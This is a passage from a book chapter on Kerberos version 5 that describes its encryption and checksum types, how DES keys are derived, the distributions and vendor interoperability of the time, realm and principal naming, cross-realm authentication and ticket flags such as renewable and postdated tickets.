The first step is to create a confounder. The confounder is a random sequence the same lengthas the encryption blocking length. Its purpose is to confuse or confound certain types of bruteforce attacks. The second step is to zero out the checksum. Next, calculate the appropriatechecksum over confounder, the zeroed checksum, and the message. Place the result in thechecksum. Add the necessary padding to bring the total length to a multiple of the encryptionblocking length. Encrypt using the specified encryption type and the appropriate key.

Unless otherwise specified, a definition of a Kerberos encryption algorithm uses this ciphertextformat. The ordering of the fields in the ciphertext is important. Additionally, messagesencoded in this format must include a length as part of the message field, to enable therecipient to verify that the message has not been truncated. Without a length, an attackercould generate a message that could be truncated, leaving the checksum intact.

To enable all implementations using a particular encryption type to communicate with allothers using that type, the specification of an encryption type defines any checksum needed aspart of the encryption process. If an alternative checksum is to be used, a new encryption typemust be defined.

Some encryption systems require additional information beyond the key and the data to beencrypted. When DES is used in Cipher Block Chaining mode, for example, it requires aninitialization vector. If required, the description for each encryption type must specify thesource of such additional information.

Encryption KeysKerberos maintains a database of active encryption keys. The following structure shows theencoding of an encryption key:

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EncryptionKey = { keytype[0] INTEGER, keyvalue[1] BYTE STRING }

■ keytype. Specifies the type of encryption key that follows in the keyvalue field. It almostalways corresponds to the encryption algorithm used to generate the encrypted data,though more than one algorithm may use the same type of key (the mapping is many toone). This might happen, for example, if the encryption algorithm uses an alternativechecksum algorithm for an integrity check or a different chaining mechanism.

■ keyvalue. Contains the key itself, encoded as a byte string.

All negative values for the encryption key type are reserved for local use. All non-negativevalues are reserved for officially assigned type fields and interpretations.

Encryption SystemsKerberos defines a number of encryption systems that may be selected for use in a message. Inaddition, it also provides a mechanism for a developer to add his own encryption method.When a principal sends a message using an encryption method, the destination principal mustalso support the encryption method. If it doesn’t, an error message will be returned.

The NULL Encryption System (null)If no encryption is in use, the encryption system is said to be a NULL encryption system. ANULL encryption system has no checksum, confounder, or padding. The ciphertext simply isthe plaintext. The NULL encryption system uses the NULL key, which is zero bytes in lengthand has keytype zero (0).

DES in CBC Mode with a CRC-32 Checksum (des-cbc-crc)The des-cbc-crc encryption mode encrypts information under the Data Encryption Standardusing the Cipher Block Chaining (CBC) mode. A CRC-32 checksum is applied to theconfounder and message sequence and placed in the checksum field. The details of theencryption of this data are identical to those for the des-cbc-md5 encryption mode.

Because the CRC-32 checksum is not collision-proof, different messages can be generatedhaving the same checksum. An attacker could use a probabilistic chosen plaintext attack togenerate a valid message, even in the face of a confounder. Using collision-proof checksums isrecommended for environments in which such attacks represent a significant threat. Any timethe message will pass through a hostile environment, such as the Internet, or any time themessage has great value, as in financial transactions, a collision-proof checksum should be used.

Note Using the CRC-32 as the checksum for ticket or authenticator no longer is mandatedas an interoperability requirement for Kerberos version 5 Specification 1.

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DES in CBC Mode with an MD4 Checksum (des-cbc-md4)The des-cbc-md4 encryption mode encrypts information under DES using the Cipher BlockChaining mode. An MD4 checksum is applied to the confounder and message sequence (msg-seq) and placed in the cksum field. The details of the encryption of this data are identical tothose for the des-cbc-md5 encryption mode.

DES in CBC Mode with an MD5 Checksum (des-cbc-md5)The des-cbc-md5 encryption mode encrypts information under the Data Encryption Standardusing the Cipher Block Chaining mode. An MD5 checksum is applied to the confounder andmessage sequence and placed in the cksum field.

Plaintext and DES ciphertext are encoded as 8-byte blocks that are concatenated to make the64-bit inputs for the DES algorithms. As a result, the data to be encrypted must be padded toan 8-byte boundary before encryption.

Encryption under DES using Cipher Block Chaining requires an additional input in the formof an initialization vector. Unless otherwise specified, zero should be used as the initializationvector. Kerberos’ use of DES requires an 8-byte confounder.

The DES specifications identify some weak and semi-weak keys. Those keys are not to be usedfor encrypting Kerberos messages. Because of the way that keys are derived for the encryptionof checksums, keys shall not be used that yield weak or semi-weak keys when eXclusive-ORedwith the constant F0F0F0F0F0F0F0F0.

A DES key is 8-bytes of data, with keytype one (1). This consists of 56 bits of key, and 8 paritybits (one per byte).

To generate a DES key from a password, the password normally must have the Kerberos realmname and each component of the principal’s name appended, then padded with ASCII nulls toan 8-byte boundary. This string is then fan-folded and eXclusive-ORed with itself to form an8-byte DES key. The parity is corrected on the key, and it is used to generate a DES-CBCchecksum on the initial string (with the realm and name appended). Next, parity is correctedon the CBC checksum. If the result matches a “weak” or “semi-weak” key as described in theDES specification, it is eXclusive-ORed with the constant 00000000000000F0. Finally, theresult is returned as the key.

ChecksumsThe following structure is used for a checksum:

Checksum = { cksumtype[0] INTEGER, checksum[1] BYTE STRING }

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■ cksumtype. Indicates the algorithm used to generate the accompanying checksum.

■ checksum. Contains the checksum itself, encoded as byte string.

Negative values for the checksum type are reserved for local use. All non-negative values arereserved for officially assigned type fields and interpretations.

Kerberos supports a variety of checksums. In addition, specific implementations may alsosupport implementation-specific checksums. The following sections describe the standardchecksums supported by Kerberos. Selection of a specific checksum is up to the applicationproviding the information.

Note Kerberos uses checksums that can be classified by two properties: whether they’recollision-proof and whether they’re keyed.

A checksum is said to be collision-proof if finding two plaintexts that generate the samechecksum value is infeasible. This means that it is not possible for someone to change amessage in a manner that leaves the checksum unchanged. Any change to the message makesan unpredictable change to the checksum.

A keyed checksum requires a key to perturb or initialize the algorithm. Keyed checksums areusually cryptographically based. This makes them collision-proof, because the randomizingeffect of the encryption makes it impossible to predict the change to the checksum of anychange in the message.

To prevent message-stream modification by an active attacker, unkeyed checksums should beused only when the checksum and message will be subsequently encrypted. For example, thechecksums defined as part of the encryption algorithms covered earlier in this section areencrypted.

Collision-proof checksums can be made tamperproof as well if the checksum value is encryptedbefore inclusion in a message. In such cases, combining the checksum and the encryptionalgorithm is considered a separate checksum algorithm. RSA-MD5 encrypted using DES is anew checksum algorithm of type RSA-MD5-DES. For most keyed checksums, as well as forthe encrypted forms of collision-proof checksums, Kerberos prepends a confounder beforecalculating the checksum.

The CRC-32 Checksum (crc32)The CRC-32 checksum calculates a checksum based on a cyclic redundancy check as describedin ISO 3309. The resulting checksum is four bytes long. The CRC-32 is neither keyed norcollision-proof. Using this checksum is not recommended, because an attacker might be ableto generate an alternative message that satisfies the checksum. Use collision-proof checksumsfor environments in which such attacks represent a significant threat such as the Internet, or anapplication with high value information.

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The RSA MD4 Checksum (rsa-md4)The RSA-MD4 checksum uses the RSA MD4 algorithm to calculate a checksum. Thealgorithm takes a message of arbitrary length as input and outputs a 128-bit (16-byte)checksum. RSA-MD4 is collision-proof.

RSA MD4 Cryptographic Checksum Using DES (rsa-md4-des)The RSA-MD4-DES checksum calculates a keyed collision-proof checksum and requires an8-byte confounder before the text. The calculation applies the RSA MD4 checksum algorithm,and encrypts the confounder and the checksum using DES in Cipher Block Chaining (CBC)mode. It uses a variant of the session key, where the variant is computed by eXclusive-ORingthe key with the constant F0F0F0F0F0F0F0F0. A variant of the key is used to limit the use ofa key to a particular function, separating the function of generating a checksum from otherencryption performed using the session key. The constant F0F0F0F0F0F0F0F0 was chosenbecause it maintains key parity. The initialization vector should be zero. The resultingchecksum is 24 bytes long, 8 bytes of which are redundant. This checksum is tamperproofand collision-proof.

The RSA MD5 Checksum (rsa-md5)The RSA-MD5 checksum uses the RSA MD5 algorithm to calculate a checksum. Thealgorithm takes a message of arbitrary length as input and outputs a 128-bit (16-byte)checksum. RSA-MD5 is collision-proof.

RSA MD5 Cryptographic Checksum Using DES (rsa-md5-des)The RSA-MD5-DES checksum calculates a keyed collision-proof checksum, the same way theRSA-MD4-DES checksum is calculated, except using RSA-MD5 rather than RSA-MD4. Theresulting checksum is 24 bytes long, 8 bytes of which are redundant. This checksum is tamper-proof and collision-proof.

DES Cipher Block Chained Checksum (des-mac)The DES-MAC checksum is computed by prepending an 8-byte confounder to the plaintextand using the session key to perform a DES CBC-mode encryption on the result. The initial-ization vector should be zero. It encrypts the same confounder and the last 8-byte block of theciphertext using DES in Cipher Block Chaining mode and a variant of the key as described inrsa-md4-des. The initialization vector should be zero. The resulting checksum is 128 bits (16bytes) long, 64 bits of which are redundant. This checksum is tamperproof and collision-proof.

RSA MD4 Cryptographic Checksum Using DES Alternative( r s a -md4 -de s - k )The RSA-MD4-DES-K checksum calculates a keyed collision-proof checksum. It uses the RSAMD4 checksum algorithm and encrypts the result using DES in Cipher Block Chaining mode.

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The DES key is used as both key and initialization vector. The resulting checksum is 16 byteslong. This checksum is tamperproof and collision-proof. This checksum type is the oldmethod for encoding the RSA-MD4-DES checksum and is no longer recommended. It issupported to provide backward compatibility.

DES Cipher-Block Chained Checksum Alternative (des-mac-k)The DES-MAC-K checksum is computed by performing a DES CBC-mode encryption of theplaintext. The last block of the ciphertext is used as the checksum value. It is keyed with anencryption key and an initialization vector. Any uses that do not specify an additional initial-ization vector will use the key as both key and initialization vector. The resulting checksum is64 bits (8 bytes) long. This checksum is tamperproof and collision-proof. This checksum typeis the old method for encoding the DES-MAC checksum and is no longer recommended. It issupported to provide backward compatibility.

Versions of KerberosSeveral different versions and distributions of Kerberos are available. Most of them are basedon MIT distributions in one form or another, but the lineage isn’t always simple to trace. Thenewest version of MIT Kerberos is version 5. Versions 4 and 5 are based on completelydifferent protocols. The MIT Kerberos version 5 distribution contains some compatibilitycode to support conversion from version 4:

■ The Kerberos version 5 server can optionally service version 4 requests.

■ A program enables users to convert a version 4 format Kerberos database to a version 5format database.

■ An administration server that accepts version 4 protocol and operates on a version 5database.

Some distributions are freely available, some are stand-alone commercial products, and othersare part of a larger free or commercial system.

Versions of Kerberos Version 4There are several VERSION 4 distributions available. Because version 4 is not totally compat-ible with version 5, organizations starting new Kerberos installations should consider startingat version 5.

MIT Kerberos Version 4 AvailabilityMIT version 4 is freely available in the U.S. and Canada through anonymous FTP ( For specific instructions, change to the pub/Kerberos

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directory and download the file README.KRB4 (for version 4) or README.KRB5 (forversion 5), both of which are text files that explain the export restrictions and contain detailedinstructions on how to download the source code via anonymous FTP. Locations outsideNorth America may use the Bones version.

Transarc KerberosA second distribution of Kerberos version 4 is available as a commercial product fromTransarc. Years ago, the designers of AFS decided to implement their own security systembased on the Kerberos specification rather than using MIT Kerberos version 4, which then wasnot publicly available. Consequently, Transarc’s AFS Kerberos speaks a slightly differentprotocol but also understands the MIT Kerberos version 4 protocol. They can, in principal,talk to each other. Enough annoying incompatible details, however, make it impractical.

DEC Ultrix KerberosA third distribution of Kerberos version 4 is available from Digital Equipment Corporation.Aside from a few changes, DEC’s commercial version essentially matches MIT Kerberosversion 4.

Versions of Kerberos Version 5Version 5 of Kerberos is the most recent version. Changes in the protocol have solved anumber of security problems from version 4.

MIT Kerberos Version 5MIT Kerberos version 5 is freely available and is available from the same site as version 4 MITvia anonymous FTP from (

OSF DCE SecurityThe Open Systems Foundation (OSF) has defined a Distributed Computing Environment(DCE) with security based on Kerberos version 5, and using the same wire protocol. However,applications from two systems use the protocol in different ways, so the actual interoperabilitybetween Kerberos and DCE is limited. Because DCE is defined as an open standard, it is up tomanufacturers to provide products that fit into that standard. More and more manufacturersare providing DCE-compliant products, and it is now possible to assemble a complete DCE-compliant security environment by selecting DCE-compliant vendors.

BonesKerberos is a network security system that relies on cryptographic methods for its security.Because Kerberos’ encryption system, DES, cannot be exported, Kerberos itself cannot be

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exported or used outside the United States and Canada in its original form. Bones is a systemthat provides the Kerberos API without using encryption and without providing any form ofsecurity—it’s a fake that enables the use of software that expects Kerberos to be present when itcannot be.

Note Bones possesses the property of there being absolutely no question about its legalityconcerning transportation of its source code across national boundaries. It neitherhas any encryption routines nor any calls to encryption routines.

You can obtain a working copy of Bones through anonymous FTP from in pub/unix/security/kerberos. A DES library is available at the same location.

SESAMESESAME is an initiative of the European community to produce a compatible product toKerberos version 5. SESAME-compatible systems are accessible through Kerberos and viceversa. SESAME makes use of DES software developed outside North America, and is notsubject to export restrictions. Information on SESAME is available from

Selecting a VendorThe following vendors currently have Kerberos offerings:


Cygnus Support

Digital Equipment Corporation

Emulex Network Systems

OpenVision Technologies, Inc.

TGV, Inc.

When looking for a vendor, you need to consider more than just software offerings. BecauseKerberos installations tend to require a considerable amount of customization, you shouldinspect consulting support. In a typical Kerberos installation, you can expect to run intocompatibility problems with the underlying operating systems of the servers, and possibly withthe applications you want to protect. A good consultant who has experience installing Kerberoscan greatly improve your chance of completing the project on time and within budget.

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Vendor Interoperability IssuesNot all vendors have implemented Kerberos in the same manner. The result is that productsfrom different vendors do not always talk to each other. This is less of a problem with version5 than version 4, but it remains an issue of concern for any organization considering aKerberos installation.

DEC ULTRIX KerberosDEC ULTRIX contains Kerberos for a single reason, namely, to provide authenticated nameservice for the ULTRIX enhanced security option. It does not support Kerberos user-levelauthentication.

DEC’s version essentially is the same as, and is derived from, MIT Kerberos version 4, exceptfor a few changes. A version 5 is due out about the same time as this book. The most signifi-cant change is that the capability to perform any kind of end-to-end user data encryption hasbeen eliminated to comply with export restrictions. Minor changes include the placement ofticket files (/var/dss/kerberos/tkt versus /tmp) and the principal names used by some standardKerberos services (for example, kprop versus rcmd). Some other minor changes probably havebeen made as well.

Although you can use DEC ULTRIX Kerberos in the normal way, no reason to do so exists,because the MIT distribution supports ULTRIX directly.

Transarc’s KerberosTransarc’s Kerberos uses a different string-to-key function (the algorithm that turns a passwordinto a DES key) than MIT Kerberos. The AFS version uses the realm name as part of thecomputation, whereas the MIT version does not. A program that uses a password to acquire aticket (for example, kinit or login) works only with one version, unless modified to try bothstring-to-key algorithms.

Transarc also uses a different method of finding Kerberos servers. MIT Kerberos uses krb.confand krb.realms to map hostnames to realms and realms to Kerberos servers. AFS servers fora realm are located on the AFS database servers and can be located using /usr/vice/etc/CellServDB. This means that a program built using the MIT Kerberos libraries looks in oneplace for the information while a program built using the AFS Kerberos libraries looks inanother. You can set up all three files and use both libraries, but be sure that everything isconsistent among the different files.

The two versions have a different password-changing protocol, so you must use the correct“kpasswd” program for the server with which you connect. In general, AFS clients that talkdirectly to the kaserver use an Rx-based protocol, instead of UDP with MIT Kerberos, so thoseAFS clients cannot talk to an MIT server.

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In summary, AFS Kerberos and MIT Kerberos can interoperate after you acquire a TicketGranting Ticket, which you can do with kinit (MIT) or klog (AFS). With a Ticket GrantingTicket, Kerberos applications such as rlogin can talk to an MIT or AFS Kerberos server andachieve correct results. However, it is probably best to pick one implementation and use itexclusively. It will reduce the administration problems.

DCEDCE Security started from an early alpha release of version 5 and the two versions havedeveloped independently. MIT and the OSF have agreed to resolve some minor incompatibilities.

The DCE Security Server, secd, listens on UDP port 88 for standard Kerberos requests andresponds appropriately. Therefore, clients of MIT Kerberos can operate in a DCE environ-ment without modification, assuming the DCE Security database contains the appropriateprincipals with the correct keys.

An MIT Kerberos version 5 server cannot replace the DCE Security Server. First, DCEapplications communicate with secd by way of the DCE RPC. Second, the DCE Securitymodel includes a Privilege Server that fills in the authorization field of a principal’s ticket withDCE-specific data, and the DCE Security Server has a built-in Privilege Server. Before theMIT Kerberos version 5 server can support DCE clients it needs to talk to a stand-alonePrivilege Server and no such Privilege Server presently exists, although the necessary informa-tion is available.

As an additional complication, the DCE does not officially export the Kerberos version 5 API.It only exports a DCE Security-specific API. Individual vendors can provide the Kerberosversion 5 API if they want, but unless they all do (which seems unlikely) Kerberos version 5API applications will not be compile-time portable to pure DCE environments. Only binarieswill work with both versions.

Interoperability RequirementsVersion 5 of the Kerberos protocol supports a myriad of options, including multiple encryp-tion and checksum types, alternative encoding schemes, optional mechanisms for pre-authentication, the handling of tickets with no addresses, options for mutual authentication,user-to-user authentication, support for proxies, forwarding, postdating and renewing tickets,formatting realm names, and handling authorization data.

You must define a minimal configuration that all implementations support to ensure theinteroperability of realms. This minimal configuration is subject to change as technology does.If it is discovered at some later date that one of the required encryption or checksum algo-rithms is not secure, for example, it will be replaced.

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Specification 1Specification 1 is the first definition of a standard set of these options. Implementationsconfigured in this way are said to support Kerberos version 5 Specification 1.

Encryption and Checksum MethodsThe following encryption and checksum mechanisms must be supported. Implementationsmay support other mechanisms as well, but the additional mechanisms may only be used whencommunicating with principals also known to support them:

Encryption: DES-CBC-MD5

Checksums:CRC-32, DES-MAC, DES-MAC-K, and DES-MD5

Realm NamesAll implementations must understand hierarchical realms in both the Internet domain and theX.500 style. When a Ticket Granting Ticket for an unknown realm is requested, the KeyDistribution Center must be able to determine the names of the intermediate realms betweenthe Key Distribution Center’s realm and the requested realm.

Transited Field EncodingDOMAIN-X500-COMPRESS must be supported. Alternative encodings may be supported,but they may be used only when all intermediate realms support that encoding.

Preauthentication MethodsThe TGS-REQ method must be supported. The TGS-REQ method is not used on the initialrequest. Clients must support the PA-ENC-TIMESTAMP method, but whether it is enabledby default may be determined per realm. If not used in the initial request, and the errorKDC_ERR_PREAUTH_REQUIRED is returned specifying PA-ENC-TIMESTAMP as anacceptable method, the client should retry the initial request using the PA-ENC-TIMESTAMP preauthentication method. Servers need not support the PA-ENC-TIMESTAMP method, but if not supported, the server should ignore the presenceof PA-ENC-TIMESTAMP preauthentication in a request.

Mutual AuthenticationMutual authentication (via the KRB_AP_REP message) must be supported.

Ticket Addresses and FlagsAll Key Distribution Centers must pass on tickets that carry no addresses. If a Ticket GrantingTicket contains no addresses, the Key Distribution Center returns derivative tickets. Each

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realm may set its own policy for issuing such tickets, and each application server sets its ownpolicy concerning accepting them. By default, servers should not accept them.

Proxies and forwarded tickets must be supported. Individual realms and application servers canset their own policy regarding when such tickets are accepted.

All implementations must recognize renewable and postdated tickets, but need not actuallyimplement them. If these options are not supported, the start time and end time in the ticketspecify a ticket’s entire useful life. When a server decodes a postdated ticket, all implementa-tions make the presence of the postdated flag visible to the calling server.

User-to-User AuthenticationSupport for user-to-user authentication, via the ENC-TKTIN-SKEY Key Distribution Centeroption, is required. Individual realms can decide as a matter of policy to reject such requests ona per-principal or realm-wide basis.

Authorization DataImplementations must pass all authorization data subfields from Ticket Granting Tickets toany derivative tickets unless directed to suppress a subfield as part of the definition of thatregistered subfield type. Passing on a subfield is never correct, and no registered subfield typespresently specify suppression at the Key Distribution Center.

Implementations must make the contents of any authorization data subfields available to theserver when a ticket is used. Implementations are not required to permit clients to specify thecontents of the authorization data fields.

Recommended Key Distribution Center ValuesThe following list supplies recommended values for a Key Distribution Center implementa-tion, based on the list of suggested configuration constants:

Minimum lifetime 5 minutes

Maximum renewable lifetime 1 week

Maximum ticket lifetime 1 day

Empty addresses Permitted only when suitable restrictions appear inauthorization data

Naming ConstraintsKerberos has several different types of names. Each type of name has its own rules, structure,and limitations.

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Realm NamesAlthough realm names are encoded as GeneralStrings and although a realm technically canselect any name it chooses, interoperability across realm boundaries requires agreement on howrealm names are to be assigned and what information they imply.

To enforce these conventions, each realm must conform to the conventions. It must requirethat any realms with which inter-realm keys are shared also conform to the conventions andrequire the same from its neighbors.

Presently, the four styles of realm names are domain, X.500, other, and reserved. Examples ofeach style follow:

domain: host.subdomain.domain X500: C=US/O=OSF other: NAMETYPE:rest/ reserved, but will not conflict with above

The most common type of name in use is the domain name. Domain names must look likeInternet domain names. They consist of components separated by periods (.) and containneither colons (:) nor slashes (/).

Some organizations use X.500 names to remain consistent with other naming conventions inuse within the organization. X.500 names contain an equal sign (=) and cannot contain a colon(:) before the equal sign. The realm names for X.500 names are string representations of thenames with components separated by slashes (leading and trailing slashes not included).

In case your organization wants to use an unusual naming convention, Kerberos allows forimplementation-specific naming systems. Names that fall into the other category must beginwith a prefix that contains no equal sign (=) or period (.) and the prefix must be followed by acolon (:) and the rest of the name. All prefixes must be assigned before they may be used.Presently none are assigned.

Finally, a category of names is left for future use. The reserved category includes strings thatdo not fall into the first three categories. All names in this category are reserved. Names areunlikely to be assigned to this category unless a very strong argument exists for not using the“other” category.

These rules guarantee no conflicts between the various name styles. The following additionalconstraints apply to assigning realm names in the domain and X.500 categories. The name of arealm for the domain or X.500 formats must be used by organizations that own an Internetdomain name or X.500 name. If no such names are registered, authority to use a realm namemay be derived from the authority of the parent realm. If E40.MIT.EDU lacks a domainname, for example, the administrator of the MIT.EDU realm can authorize the creation of arealm of that name.

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This is acceptable because the organization to which the parent is assigned presumably is theorganization authorized to assign names to its children in the X.500 and domain name systemsas well. If the parent assigns a realm name without also registering it in the domain name orX.500 hierarchy, the parent is responsible for ensuring that a name identical to the realm nameof the child does not exist in the future unless assigned to the child.

Principal NamesAs was the case for realm names, conventions are needed to ensure that all agree on whatinformation is implied by a principal name. The name-type field that is part of the principalname indicates the kind of information implied by the name. The name type should be treatedas a hint. Ignoring the name type, no two names can be the same. At least one of the compo-nents, or the realm, must be different. An example of a principal name is a username ofJSmith. It would have a type of NT-PRINCIPAL, and the realm name ofRESEARCH.ABC.COM (domain name style) would be considered to be a part of theprincipal name. The following name types are defined:

Name Type Value Meaning

NT-UNKNOWN 0 Name type not known

NT-PRINCIPAL 1 Just the name of the principal as in DCE, or for users

NT-SRV-INST 2 Service and other unique instance (krbtgt)

NT-SRV-HST 3 Service with host name as instance (telnet,rcommands)

NT-SRV-XHST 4 Service with host as remaining components

NT-UID 5 Unique ID

When a name implies no information other than its uniqueness at a particular time, the nametype PRINCIPAL should be used. The principal name type should be used for users, and italso might be used for a unique server. If the name is a unique machine-generated ID guaran-teed never to be reassigned, then the name type of UID should be used. Reassigning namesof any type generally is a bad idea because stale entries might remain in Access Control Lists.Reassigned names could acquire rights to information that were not intended. This problem iscalled object reuse because the new owner of the name gets to use the information as a result ofthe previous owner of the name having rights to use the object.

If the first component of a name identifies a service and the remaining components identify aninstance of the service in a server-specified manner, then the name type of SRV-INST shouldbe used. An example of this name type is the Kerberos Ticket Granting Ticket that has a firstcomponent of krbtgt and a second component that identifies the realm for which the ticket isvalid.

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If an instance is a single component following the service name and the instance identifies thehost on which the server is running, then the name type SRV-HST should be used. This typetypically is used for Internet services such as Telnet and the Berkeley R commands. If theseparate components of the host name appear as successive components following the name ofthe service, then the name type SRVXHST should be used. This type might be used to identifyservers on hosts with X.500 names where the slash (/) might otherwise be ambiguous.

A name type of UNKNOWN should be used when the form of the name is not known. Whencomparing names, a name type of UNKNOWN matches principals authenticated with namesof any type. A principal authenticated with a name type of UNKNOWN, however, matchesonly other names type of UNKNOWN.

Name of Server PrincipalsThe principal identifier for a server on a host generally is composed of the following two parts:

■ The realm of the Key Distribution Center with which the server is registered

■ A two-component name of type NT-SRV-HST if the host name is an Internet domainname, or a multicomponent name of type NT-SRV-XHST if the name of the host is of aform that permits slash (/) separators, such as X.500

The first component of the multicomponent name identifies the service and the latter compo-nents identify the host. Where the name of the host is not case-sensitive (for example, withInternet domain names), the name of the host must be lowercase. For services such as Telnetand the Berkeley R commands that run with system privileges, the first component is thestring “host” rather than a service-specific identifier.

Cross-Realm OperationThe Kerberos protocol is designed to operate across organizational boundaries. A client in oneorganization can be authenticated to a server in another. Each organization that wants to run aKerberos server establishes its own realm. The name of the realm in which a client is registeredis part of the client’s name, and can be used by the end-service to decide whether to honor arequest.

By establishing inter-realm keys, the administrators of two realms can enable a client authenti-cated in the local realm to use its authentication remotely. With appropriate permission, theclient could arrange registration of a separately named principal in a remote realm and engagein normal exchanges with that realm’s services. For even small numbers of clients, however,this becomes cumbersome, and more automatic methods are necessary. The exchange of inter-realm keys (a separate key may be used for each direction) registers the Ticket Granting Serviceof each realm as a principal in the other realm. A client then can obtain a Ticket Granting

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Ticket for the remote realm’s Ticket Granting Service from its local realm. When that TicketGranting Ticket is used, the remote Ticket Granting Service uses the inter-realm key, whichusually differs from its own normal Ticket Granting Server key, to decrypt the Ticket GrantingTicket. It thereby can be certain that it was issued by the client’s own Ticket Granting Server.Tickets issued by the remote Ticket Granting Service let the end-service know that the clientwas authenticated from another realm.

A realm is said to communicate with another realm if the two realms share an inter-realm keyor if the local realm shares an inter-realm key with an intermediate realm that communicateswith the remote realm. An authentication path is the sequence of intermediate realms transitedin communicating from one realm to another.

Realms typically are organized hierarchically. Each realm shares a key with its parent and adifferent key with each child. If an inter-realm key is not directly shared by two realms, thehierarchical organization permits an authentication path to be constructed. If a hierarchicalorganization is not used, it might be necessary to consult some database before constructing anauthentication path between realms is possible. If there is regular communication between tworealms that are not directly connected in the hierarchy, they can set up a direct key betweenthe two realms. Figure 9.3 shows a corporate hierarchy with the links between systemsrepresenting a connection with a shared key. Note that there is a direct connection betweenProjectW.RESEARCH.ABC.COM and ProjectW.PAYROLL.ABC.COM. Any time aconnection will see significant data flows, an inter-realm key can be created and sharedbetween the servers.


Accounting PayrollResearchProduction

ProjectXProjectW ProjectXProjectW

Figure 9.3A corporate hierarchy withshared key.

Although realms typically are hierarchical, intermediate realms can be bypassed to achievecross-realm authentication through alternative authentication paths. These might be estab-lished to make communication between two realms more efficient. The end-service needs toknow which realms were transited when deciding how much faith to place in the authentica-tion process. To facilitate this decision, a field in each ticket contains the names of the realmsinvolved in authenticating the client.

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Ticket FlagsEach Kerberos ticket contains a set of bit flags that are used to indicate attributes of that ticket.Most flags can be requested by a client when the ticket is obtained. Some are turned on and offautomatically by a Kerberos server as required. The following sections explain what the variousflags mean, and give examples of reasons to use such a flag.

Table 9.1 describes the ticket flags.

Table 9.1Ticket Flags

Bit(s) Name Description

0 RESERVED Reserved for future expansion.

1 FORWARDABLE This flag tells the Ticket Granting Server that it is OKto issue a new Ticket Granting Ticket with a differentnetwork address based on the presented ticket.

2 FORWARDED This flag indicates that the ticket has either beenforwarded or was issued based on authenticationinvolving a forwarded Ticket Granting Ticket.

3 PROXIABLE The PROXIABLE flag has an interpretation identicalto that of the FORWARDABLE flag, except that thePROXIABLE flag tells the Ticket Granting Server thatonly non-Ticket Granting Tickets may be issued withdifferent network addresses.

4 PROXY When set, this flag indicates that a ticket is a proxy.

5 MAY-POSTDATE This flag tells the Ticket Granting Server that a postdated ticket may be issued based on this TicketGranting Ticket.

6 POSTDATED This flag indicates that this ticket has been postdated.

7 INVALID This flag indicates that a ticket must be validatedbefore use.

8 RENEWABLE A renewable ticket can be used to obtain a replacementticket that expires at a later date.

9 INITIAL This flag indicates that this ticket was issued using theAuthentication Server protocol, and not issued basedon a Ticket Granting Ticket.

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10 PRE-AUTHENT This flag indicates that during initial authentication,the client was authenticated by the Key DistributionCenter before a ticket was issued.

11 HW-AUTHENT This flag indicates that the protocol employed forinitial authentication required the use of hardwareexpected to be possessed solely by the named client.

12–31 RESERVED Reserved for future use.

Initial and Preauthenticated TicketsThe INITIAL flag indicates that a ticket was issued using the Authentication Server protocoland not issued based on a Ticket Granting Ticket. Application servers that want to require theknowledge of a client’s secret key (for example, a password changing program) can insist thatthis flag be set in any tickets they accept. Thus, they are assured that the client’s key wasrecently presented to the application client.

Invalid TicketsThe INVALID flag indicates that a ticket is invalid. Application servers must reject tickets thathave this flag set. A postdated ticket usually is issued in this form. Invalid tickets must bevalidated by the Key Distribution Center before use, by presenting them to the Key Distribu-tion Center in a Ticket Granting Server request with the VALIDATE option specified. TheKey Distribution Center will validate tickets only after their start time has passed. Thus, thevalidation is required so that postdated tickets that have been stolen before their start time canbe rendered permanently invalid using a hot-list mechanism.

Renewable TicketsApplications might want to hold tickets that can be valid for long periods of time. This canexpose their credentials to potential theft for equally long periods and those stolen credentialswould be valid until the expiration time of the ticket(s). Simply using short-lived tickets andobtaining new ones periodically would require the client to have long-term access to its secretkey, an even greater risk.

The solution to this problem is a renewable ticket. Renewable tickets can be used to mitigatethe consequences of theft. Renewable tickets have two expiration times. The first is when thecurrent instance of the ticket expires and the second is the latest permissible value for anindividual expiration time. An application client must present a renewable ticket to the KeyDistribution Center before it expires. The ticket is presented with the RENEW option set in

Bit(s) Name Description

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the Key Distribution Center request. The Key Distribution Center issues a new ticket with anew session key and a later expiration time. All other fields of the ticket are left unmodified bythe renewal process. When the latest permissible expiration time arrives, the ticket expirespermanently. At each renewal, the Key Distribution Center can consult a hot-list to determineif the ticket had been reported stolen since its last renewal. It refuses to renew such stolentickets, thereby reducing the usable lifetime of stolen tickets.

The RENEWABLE flag in a ticket normally is interpreted only by the Ticket GrantingService. Application servers usually can ignore it. Some particularly careful applicationservers, however, might want to disallow renewable tickets.

If a renewable ticket is not renewed by its expiration time, the Key Distribution Center willnot renew the ticket. The RENEWABLE flag is reset by default, but a client can request it beset by setting the RENEWABLE option in the KRB_AS_REQ message. If it is set, then therenew-till field in the ticket contains the time after which the ticket may not be renewed.

A renewable ticket will be used when a user wants to run a particularly long process. Becausethe application will run for longer than the local policy allows a single ticket to live, theapplication will request a renewable ticket. As the simulation is running, the application willoccasionally request the Key Distribution Center to renew the ticket. This verifies that theworkstation controlling the simulation has not been listed as compromised.

Postdated TicketsApplications occasionally might need to obtain tickets for use much later. A batch submissionsystem, for example, would need tickets to be valid at the time the batch job is serviced.Holding valid tickets in a batch queue is dangerous, however, because they stay online longer,becoming more prone to theft. Postdated tickets provide a way to obtain these tickets from theKey Distribution Center at job submission time, but to leave them dormant until they areactivated and validated by a further request of the Key Distribution Center. If a ticket theftwere reported in the interim, the Key Distribution Center would refuse to validate the ticket,and the thief would be foiled.

The MAY-POSTDATE flag in a ticket normally is interpreted only by the Ticket GrantingService. Application servers can ignore it. This flag must be set in a Ticket Granting Ticket inorder to issue a postdated ticket based on the presented ticket. It is reset by default. A clientcan request it by setting the ALLOW-POSTDATE option in the KRB_AS_REQ message.This flag does not permit a client to obtain a postdated Ticket Granting Ticket. PostdatedTicket Granting Tickets can be obtained only by requesting the postdating in theKRB_AS_REQ message.

When a postdated ticket is issued, the life (end time-start time) of the ticket is the remaininglife of the ticket-granting ticket at the time of the request, unless the RENEWABLE optionalso is set, in which case it can be the full life (end time-start time) of the Ticket GrantingTicket. The Key Distribution Center can limit how far in the future a ticket may be postdated.

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The POSTDATED flag indicates that a ticket has been postdated. The application server cancheck the authtime field in the ticket to see when the original authentication occurred. Someservices might reject postdated tickets, or accept them only within a certain period after theoriginal authentication. When the Key Distribution Center issues a POSTDATED ticket, italso is marked as INVALID, so that the application client must present the ticket to the KeyDistribution Center to be validated before use.

